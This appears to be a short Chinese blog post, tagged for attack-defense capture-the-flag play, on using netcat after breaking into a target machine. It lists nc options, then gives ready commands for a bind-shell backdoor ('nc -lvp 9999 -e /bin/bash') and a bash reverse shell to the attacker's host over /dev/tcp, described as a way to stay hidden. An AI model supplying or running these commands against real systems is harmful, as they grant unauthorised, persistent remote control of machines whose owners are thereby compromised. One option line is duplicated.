nc——制作后门连接与反弹shell连接的使用

一、nc参数

  • -g<网关> 设置路由器跃程通信网关,最多可设置8个
  • -G<指向器数目> 设置来源路由指向器,其数值为4的倍数
  • -h 在线帮助
  • -i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口
  • -l 使用监听模式,管控传入的资料
  • -n 直接使用IP地址,而不通过域名服务器。
  • -o<输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存
  • -p<通信端口> 设置本地主机使用的通信端口
  • -r 乱数指定本地与远端主机的通信端口
  • -s<来源位址> 设置本地主机送出数据包的IP地址
  • -u 使用UDP传输协议
  • -v 显示指令执行过程
  • -w<超时秒数> 设置等待连线的时间
  • -z 使用0输入/输出模式,只在扫描通信端口时使用

二、nc常用参数

  • -l 使用监听模式,管控传入的资料。
  • -p<通信端口> 设置本地主机使用的通信端口。
  • -p<通信端口> 设置本地主机使用的通信端口。

三、制作后门连接

利用场景:成功渗透目标靶机,获得靶机shell。注:一些特殊端口容易暴露

靶机:nc -lvp 9999 -e /bin/bash
攻击机:nc x.x.x.x 9999

四、反弹shell连接

利用场景:成功渗透目标靶机,获得靶机shell,为了更好地隐藏自己,使靶机连接我们的攻击机

攻击机:nc -lvp 9999
靶机:bash -i >& /dev/tcp/target ip/target port 0>&1

你可能感兴趣的:(AWD)